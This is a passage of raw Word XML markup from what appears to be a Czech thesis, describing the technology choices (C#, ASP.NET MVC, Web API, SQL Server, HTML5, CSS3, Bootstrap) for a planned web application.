    <w:p w:rsidR="00DF1A91" w:rsidRDefault="001F727E" w:rsidP="001F727E">
      <w:r>
        <w:t xml:space="preserve">Pro psaní ASP.NET aplikací lze využít více programovacích jazyků, ale nejrozšířenější je C#. Ten stejně jako samotný </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> prochází vývojem a nyní je dostupná již jeho </w:t>
      </w:r>
      <w:r w:rsidR="009E70A8">
        <w:t>pátá</w:t>
      </w:r>
      <w:r w:rsidR="00785676">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t>verze. Jedná se o objektov</w:t>
      </w:r>
      <w:r w:rsidR="00785676">
        <w:t xml:space="preserve">ě orientovaný </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">jazyk, který </w:t>
      </w:r>
      <w:r w:rsidR="00785676">
        <w:t xml:space="preserve">se kompiluje do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00785676">
        <w:t>Common</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00785676">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00785676">
        <w:t>Intermediate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00785676">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00785676">
        <w:t>Language</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00785676">
        <w:t xml:space="preserve"> (CIL), což je byte kód platformy .NET, který je spouštěný ve virtuálním stroji </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00785676">
        <w:t>Common</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00785676">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00785676">
        <w:t>Language</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00785676">
        <w:t xml:space="preserve"> Runtime (CLR). CLR potom interpretuje CIL a převádí jeho instrukce na strojový kód. Jednou z výhod tohoto řešení je například automatická správa paměti, takže se vývojář nemusí starat o její alokaci a uvolňování.</w:t>
      </w:r>
      <w:r w:rsidR="006307E5">
        <w:t xml:space="preserve"> Jednotlivé aspekty programovacího jazyka C# jsou výborně popsány v knize </w:t>
      </w:r>
      <w:r w:rsidR="006307E5" w:rsidRPr="009E70A8">
        <w:t xml:space="preserve">C# in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006307E5" w:rsidRPr="009E70A8">
        <w:t>Depth</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006307E5">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2821571"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION YmeR94cSTyIFN3m7 \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[20]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="006307E5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001F727E" w:rsidRDefault="00DF1A91" w:rsidP="001F727E">
      <w:r>
        <w:t>Díky použití ASP.NET a jazyka C# je možné jádro aplikace implementovat velmi podobným způsobem jako kdyby se jednalo o klasickou desktop aplikaci.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00DF1A91" w:rsidRDefault="007674A5" w:rsidP="00DF1A91">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="172" w:name="_Toc387327868"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>ASP.NET MVC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="172"/>
    </w:p>
    <w:p w:rsidR="00DF1A91" w:rsidRDefault="00C60271" w:rsidP="00DF1A91">
      <w:r>
        <w:t>ASP.NET nabízí několik možností</w:t>
      </w:r>
      <w:r w:rsidR="009E70A8">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> jak implementovat webové aplikace. V této práci bude využit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ASP.NET MVC, který implementuje architektonický vzor Model-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>View</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Controller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (MVC). </w:t>
      </w:r>
      <w:r w:rsidR="00645334">
        <w:t xml:space="preserve">MVC striktně odděluje datový model, uživatelské rozhraní a </w:t>
      </w:r>
      <w:r w:rsidR="007674A5">
        <w:t>aplikační</w:t>
      </w:r>
      <w:r w:rsidR="00645334">
        <w:t xml:space="preserve"> logiku. Každý požadavek klienta je pomocí </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00645334">
        <w:t>routing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00645334">
        <w:t xml:space="preserve"> systému využív</w:t>
      </w:r>
      <w:r w:rsidR="009E70A8">
        <w:t>ajícího</w:t>
      </w:r>
      <w:r w:rsidR="00645334">
        <w:t xml:space="preserve"> zaregistrovaných vzorů v URL, předán k vyřízení správnému kontroléru, což je třída implementující definované rozhraní. Nad instancí této třídy je zavolána metoda, opět identifikovaná pomocí vzoru v URL. Zodpovědností metod kontroléru je získání požadovaných dat (modelu), případně vytvoření modelu ze zaslaných dat. Tento model kontrolér následně předá pohledu (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00645334">
        <w:t>view</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00645334">
        <w:t xml:space="preserve">), který z něj vytvoří požadovaný výstup v uživatelském rozhraní. Výsledek je poté vrácen jako odpověď na klientův požadavek. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2821606"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION RDYSESMuLfUdZo1R \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[21]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="007674A5" w:rsidRDefault="007674A5" w:rsidP="00DF1A91">
      <w:r>
        <w:t>ASP.NET MVC bylo zvoleno právě kvůli jasnému oddělení prezentační vrstvy od datového modelu a aplikační logiky. To přináší výhody především z hlediska přehlednosti a udržovatelnosti aplikace, protože lze velmi snadno pokrýt aplikační logiku unit testy.</w:t>
      </w:r>
      <w:r w:rsidR="005853B1">
        <w:t xml:space="preserve"> Framework ASP.NET MVC má navíc odlišný vydávací cyklus od základního ASP.NET </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005853B1">
        <w:t>framewo</w:t>
      </w:r>
      <w:r w:rsidR="00B10772">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="005853B1">
        <w:t>ku</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="005853B1">
        <w:t>, takže nové verze jsou uvolňovány podstatně rychleji.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C6224B" w:rsidRDefault="00C6224B" w:rsidP="00C6224B">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="173" w:name="_Toc387327869"/>
      <w:r>
        <w:t>ASP.NET Web</w:t>
      </w:r>
      <w:r w:rsidR="003F11D6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>API</w:t>
      </w:r>
      <w:bookmarkEnd w:id="173"/>
    </w:p>
    <w:p w:rsidR="00C6224B" w:rsidRDefault="00D02250" w:rsidP="00C6224B">
      <w:r>
        <w:t xml:space="preserve">ASP.NET Web API je </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A44584">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pomocí </w:t>
      </w:r>
      <w:r w:rsidR="00A44584">
        <w:t>něhož</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> lze jednoduše vytvářet </w:t>
      </w:r>
      <w:r w:rsidR="00D23AC5">
        <w:t xml:space="preserve">REST </w:t>
      </w:r>
      <w:r>
        <w:t>služby, které mohou svým konzumentům nabídnout různou funkcionalitu aplikace</w:t>
      </w:r>
      <w:r w:rsidR="00D23AC5">
        <w:t xml:space="preserve"> skrze protokol HTTP</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009707BC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Typickým konzumentem takových služeb může být například webová stránka, která dynamicky </w:t>
      </w:r>
      <w:r w:rsidR="00F77C31">
        <w:t>načítá</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> data pomocí asynchronních požadavků. Další možností je například mobilní aplikace, která má vlastní uživatelské rozhraní a pomocí</w:t>
      </w:r>
      <w:r w:rsidR="00F77C31">
        <w:t xml:space="preserve"> služby přistupuje k datům na serveru nebo s nimi manipuluje.</w:t>
      </w:r>
      <w:r w:rsidR="009707BC">
        <w:t xml:space="preserve"> Web API služba </w:t>
      </w:r>
      <w:r w:rsidR="00D23AC5">
        <w:t>vrací odpovědi ve formátu JSON nebo XML v závislosti na klientovi, který požadavek odeslal.</w:t>
      </w:r>
      <w:r w:rsidR="0031145E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2821678"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION RDYSESMuLfUdZo1R \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[21]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="0031145E" w:rsidRDefault="009B6C7C" w:rsidP="00C6224B">
      <w:r>
        <w:t xml:space="preserve">Web API bude použito u přehledových stránek aplikace, konkrétně na stránkách </w:t>
      </w:r>
      <w:r w:rsidRPr="009B6C7C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Přehled</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r w:rsidR="00BD58A3">
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="009B6C7C">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Vozidla</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, na kterých není žádoucí, aby se uživateli načítala celá stránka znovu v případě, kdy si například změní výčet zobrazených štítků. V takovém případě bude následovat asynchronní požadavek na Web API službu, která bude požádána o dodání chybějících dat. Tato data budou poté dynamicky přidána k již zobrazeným datům. Tento přístup zrychlí odezvu na akce uživatele a také bude šetřit množství přenesených dat, což je důležité </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>především v případě, kdy uživatel k aplikaci přistupuje prostřednictvím mobilního telefonu</w:t>
      </w:r>
      <w:r w:rsidR="00BD58A3">
        <w:t xml:space="preserve"> s pomalým nebo omezeným datovým spojením</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00657D14" w:rsidRDefault="00160BBF" w:rsidP="00657D14">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="174" w:name="_Toc387327870"/>
      <w:r>
        <w:t xml:space="preserve">Microsoft </w:t>
      </w:r>
      <w:r w:rsidR="00657D14">
        <w:t>SQL Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="174"/>
    </w:p>
    <w:p w:rsidR="00657D14" w:rsidRDefault="00160BBF" w:rsidP="00657D14">
      <w:r>
        <w:t xml:space="preserve">Jako datové úložiště bude využit Microsoft SQL Server. ASP.NET s ním dobře spolupracuje a v případě, kdy by aplikace </w:t>
      </w:r>
      <w:r w:rsidR="00DF1E63">
        <w:t>obsluhovala mnoho uživatelů</w:t>
      </w:r>
      <w:r w:rsidR="00D568AB">
        <w:t>,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> by mohl být výkon běžně dostupných </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hosting</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> balíčků nedostatečný. V takové situaci by bylo možné aplikaci přesunout do </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cloud</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> řešení Microsoft Azure, které jako databázový server využívá Microsoft SQL Azure</w:t>
      </w:r>
      <w:r w:rsidR="00867518">
        <w:t xml:space="preserve"> a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00867518">
        <w:t>m</w:t>
      </w:r>
      <w:r>
        <w:t>igrace databáze z Microsoft SQL Server na SQL A</w:t>
      </w:r>
      <w:r w:rsidR="00F16848">
        <w:t xml:space="preserve">zure je řešitelná poměrně lehce. Jiné databázové servery se více či méně liší, srovnání zápisů konkrétních jazykových konstrukcí mezi systémy Microsoft SQL Server, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F16848">
        <w:t>Oracle</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F16848">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F16848">
        <w:t>MySQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F16848">
        <w:t xml:space="preserve"> ukazuje kniha </w:t>
      </w:r>
      <w:r w:rsidR="00F16848" w:rsidRPr="00DF1E63">
        <w:t>SQL Hotová řešení</w:t>
      </w:r>
      <w:r w:rsidR="00F16848">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="10254422"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION KZn2tMUn6lDoWjNu \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[22]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00F16848">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007B658A" w:rsidRDefault="007B658A" w:rsidP="007B658A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="175" w:name="_Toc387327871"/>
      <w:r>
        <w:t>HTML5</w:t>
      </w:r>
      <w:r w:rsidR="003140E1">
        <w:t xml:space="preserve"> a CSS3</w:t>
      </w:r>
      <w:bookmarkEnd w:id="175"/>
    </w:p>
    <w:p w:rsidR="003140E1" w:rsidRDefault="00D568AB" w:rsidP="00D568AB">
      <w:r>
        <w:t xml:space="preserve">Klientská část aplikace bude postavena na HTML5, který oproti svým starším variantám nabízí především mnohem lepší možnosti při vytváření přístupných stránek. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003140E1" w:rsidRDefault="00D568AB" w:rsidP="00D568AB">
      <w:r>
        <w:t xml:space="preserve">HTML5 zavádí nové sémantické značky, jako je </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>h</w:t>
      </w:r>
      <w:r w:rsidRPr="00D568AB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>eader</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (hlavička stránky),  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>f</w:t>
      </w:r>
      <w:r w:rsidRPr="00D568AB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ooter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (patička stránky), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidRPr="00D568AB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>ain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (hlavní obsah), </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>&lt;n</w:t>
      </w:r>
      <w:r w:rsidRPr="00D568AB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>av</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (navigace), </w:t>
      </w:r>
      <w:r w:rsidRPr="00D568AB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D568AB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>section</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D568AB">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (sémanticky oddělená část stránky) a další. Dále je značně rozšířen výčet typů ovládacího prvku </w:t>
      </w:r>
      <w:r w:rsidRPr="00605C37">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>&lt;input&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, například o </w:t>
      </w:r>
      <w:r w:rsidRPr="00605C37">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>tel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (zadávání telefonních čísel), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605C37">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (vyhledávání), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605C37">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (zadání UR</w:t>
      </w:r>
      <w:r w:rsidR="00DF1E63">
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> adresy), </w:t>
      </w:r>
      <w:r w:rsidRPr="00605C37">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (zadání emailové adresy), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605C37">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>datetime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (zadání data a</w:t>
      </w:r>
      <w:r w:rsidR="00056A7A">
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">času), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605C37">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>date</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (zadání data), </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00605C37">
        <w:rPr>
          <w:rStyle w:val="CodeChar"/>
        </w:rPr>
        <w:t>number</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> (zadání čísla) a mnohé další. </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2821679"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION ykUXSwBZhSedNE28 \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[23]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
    </w:p>
    <w:p w:rsidR="003140E1" w:rsidRDefault="00605C37" w:rsidP="00D568AB">
      <w:r>
        <w:t xml:space="preserve">Nové vlastnosti HTML5 pomáhají čtečkám obrazovky rozlišit význam jednotlivých prvků na stránce, navíc je využívají prohlížeče mobilních telefonů, které například při zadávání čísla zobrazí pouze numerickou klávesnici namísto kompletní klávesnice, což kromě přístupnosti zlepšuje i použitelnost. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D568AB" w:rsidRDefault="003140E1" w:rsidP="00D568AB">
      <w:r>
        <w:t xml:space="preserve">Co se týče </w:t>
      </w:r>
      <w:r w:rsidR="0072716E">
        <w:t>definice</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> vzhledu aplikace, tak bude použito CSS3, které stejně jako HTML5 oproti svému předchůdci přináší spoustu vylepšení. Například zakulacené rohy a stín blokových elementů se ve starším CSS musely řešit pomocí různých speciálních technik, které jsou například detailně popsány v knize </w:t>
      </w:r>
      <w:r w:rsidRPr="00DF1E63">
        <w:t>Mistrovství v CSS</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2821719"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION Ttn7fP9ha9qrrpcV \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[24]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:t>, zatímco v CSS3 na jejich vytvoření stačí aplikování jediného pravidla.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003140E1" w:rsidRDefault="003140E1" w:rsidP="00D568AB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Je ovšem na místě zmínit také fakt, že HTML5 a CSS3 </w:t>
      </w:r>
      <w:r w:rsidR="00161435">
        <w:t xml:space="preserve">nejsou podporované staršími prohlížeči, jmenovitě například Internet Explorer většinu nových vlastností podporuje až od verze 10.0. Při používání nové vlastnosti je tedy dobré zvážit, zda stojí její využití za ztrátu kompatibility například s nějakým dosud rozšířeným prohlížečem. Při tomto rozhodování skvěle poslouží nástroj </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00161435" w:rsidRPr="00DF1E63">
        <w:t>Can</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00161435" w:rsidRPr="00DF1E63">
        <w:t xml:space="preserve"> I use...</w:t>
      </w:r>
      <w:r w:rsidR="00161435">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="2821797"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:fldSimple w:instr=" CITATION FfS91T4XnZgrDqV4 \* MERGEFORMAT ">
            <w:r w:rsidR="00956893">
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:t>[25]</w:t>
            </w:r>
          </w:fldSimple>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00161435">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00502B7A" w:rsidRDefault="00502B7A" w:rsidP="00502B7A">
      <w:pPr>
        <w:pStyle w:val="Nadpis3"/>
      </w:pPr>
      <w:bookmarkStart w:id="176" w:name="_Toc387327872"/>
      <w:r>
        <w:t>Bootstrap</w:t>
      </w:r>
      <w:r w:rsidR="005F2B6F">
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005F2B6F">
        <w:t>jQuery</w:t>
      </w:r>
      <w:bookmarkEnd w:id="176"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00502B7A" w:rsidRDefault="005F2B6F" w:rsidP="00502B7A">
      <w:r>
        <w:t>Bootstrap je front-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>end</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>framework</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> poskytující nástroje pro rychlou tvorbu responsivních webových aplikací. Jedná se o propojení CSS stylů a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F4311">
        <w:t>J</w:t>
      </w:r>
      <w:r>
        <w:t>ava</w:t>
      </w:r>
      <w:r w:rsidR="002F4311">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t>cipt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> kódu, díky kterému vývojáři stačí jen respektovat určitá pravidla při psaní HTML </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>markupu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> a bez </w:t>
      </w:r>
      <w:r w:rsidR="0072716E">
        <w:t xml:space="preserve">nutnosti vytváření </w:t>
      </w:r>
      <w:r>
        <w:t>dalších stylů</w:t>
      </w:r>
      <w:r w:rsidR="0072716E">
        <w:t xml:space="preserve"> nebo skriptů</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> získá v základu již dobře vypadající webovou stránku</w:t>
      </w:r>
      <w:r w:rsidR="002F4311">
        <w:t xml:space="preserve"> s </w:t>
      </w:r>
      <w:r w:rsidR="00123CB0">
        <w:t>kvalitní</w:t>
      </w:r>
      <w:r w:rsidR="002F4311">
        <w:t xml:space="preserve"> typografií</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, která bude </w:t>
      </w:r>
      <w:r w:rsidRPr="00123CB0">
        <w:t xml:space="preserve">mobile </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00123CB0">
        <w:t>first</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
